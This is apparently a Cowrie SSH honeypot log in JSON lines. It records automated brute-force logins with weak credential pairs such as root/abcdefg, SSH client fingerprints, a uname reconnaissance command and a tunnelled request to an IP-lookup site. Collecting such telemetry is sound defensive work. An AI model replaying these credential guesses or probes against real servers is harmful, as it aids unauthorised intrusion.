{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:39.057270Z","src_ip":"212.227.125.160","session":"9037a6128cf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38736,"dst_ip":"1.2.3.4","dst_port":22,"session":"695feaf98e11","protocol":"ssh","message":"New connection: 212.227.235.229:38736 (1.2.3.4:22) [session: 695feaf98e11]","sensor":"my-vps","timestamp":"2025-08-31T04:46:40.702903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:40.706013Z","src_ip":"212.227.235.229","session":"695feaf98e11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54088,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc214a7abea2","protocol":"ssh","message":"New connection: 212.227.235.229:54088 (1.2.3.4:22) [session: cc214a7abea2]","sensor":"my-vps","timestamp":"2025-08-31T04:46:41.062160Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:46:41.436976Z","src_ip":"212.227.125.160","session":"052e1f4140bc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:46:41.437767Z","src_ip":"212.227.125.160","session":"052e1f4140bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38748,"dst_ip":"1.2.3.4","dst_port":22,"session":"b99fb18320a8","protocol":"ssh","message":"New connection: 212.227.235.229:38748 (1.2.3.4:22) [session: b99fb18320a8]","sensor":"my-vps","timestamp":"2025-08-31T04:46:42.255520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:42.305787Z","src_ip":"212.227.235.229","session":"cc214a7abea2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:42.306447Z","src_ip":"212.227.235.229","session":"cc214a7abea2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:42.414832Z","src_ip":"212.227.235.229","session":"b99fb18320a8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:42.516912Z","src_ip":"212.227.235.229","session":"b99fb18320a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:42.679031Z","src_ip":"212.227.125.160","session":"052e1f4140bc"}
{"eventid":"cowrie.session.closed","duration":"18.3","message":"Connection lost after 18.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:42.680254Z","src_ip":"212.227.125.160","session":"052e1f4140bc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:42.859127Z","src_ip":"212.227.235.229","session":"695feaf98e11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38718,"dst_ip":"1.2.3.4","dst_port":22,"session":"f363e50ddcac","protocol":"ssh","message":"New connection: 212.227.235.229:38718 (1.2.3.4:22) [session: f363e50ddcac]","sensor":"my-vps","timestamp":"2025-08-31T04:46:43.314715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:43.315655Z","src_ip":"212.227.235.229","session":"f363e50ddcac"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:43.585541Z","src_ip":"212.227.235.229","session":"fdffd5004a4c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:45.226449Z","src_ip":"212.227.235.229","session":"f363e50ddcac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38758,"dst_ip":"1.2.3.4","dst_port":22,"session":"23ad0f691e09","protocol":"ssh","message":"New connection: 212.227.235.229:38758 (1.2.3.4:22) [session: 23ad0f691e09]","sensor":"my-vps","timestamp":"2025-08-31T04:46:45.774124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:45.777775Z","src_ip":"212.227.235.229","session":"23ad0f691e09"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:46.043957Z","src_ip":"212.227.235.229","session":"23ad0f691e09"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:46.049185Z","src_ip":"212.227.235.229","session":"fdffd5004a4c"}
{"eventid":"cowrie.login.success","username":"root","password":"abcdefg","message":"login attempt [root/abcdefg] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:46:46.549606Z","src_ip":"212.227.235.229","session":"695feaf98e11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:46:48.048029Z","session":"695feaf98e11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52378,"dst_ip":"1.2.3.4","dst_port":22,"session":"da7de7e4974a","protocol":"ssh","message":"New connection: 212.227.235.229:52378 (1.2.3.4:22) [session: da7de7e4974a]","sensor":"my-vps","timestamp":"2025-08-31T04:46:48.257394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:48.278882Z","src_ip":"212.227.235.229","session":"da7de7e4974a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60708,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffdda6180f30","protocol":"ssh","message":"New connection: 212.227.125.160:60708 (1.2.3.4:22) [session: ffdda6180f30]","sensor":"my-vps","timestamp":"2025-08-31T04:46:48.375758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:48.376516Z","src_ip":"212.227.125.160","session":"ffdda6180f30"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:48.525772Z","src_ip":"212.227.235.229","session":"da7de7e4974a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:48.559040Z","src_ip":"212.227.125.160","session":"ffdda6180f30"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:49.109299Z","src_ip":"212.227.125.160","session":"ffdda6180f30"}
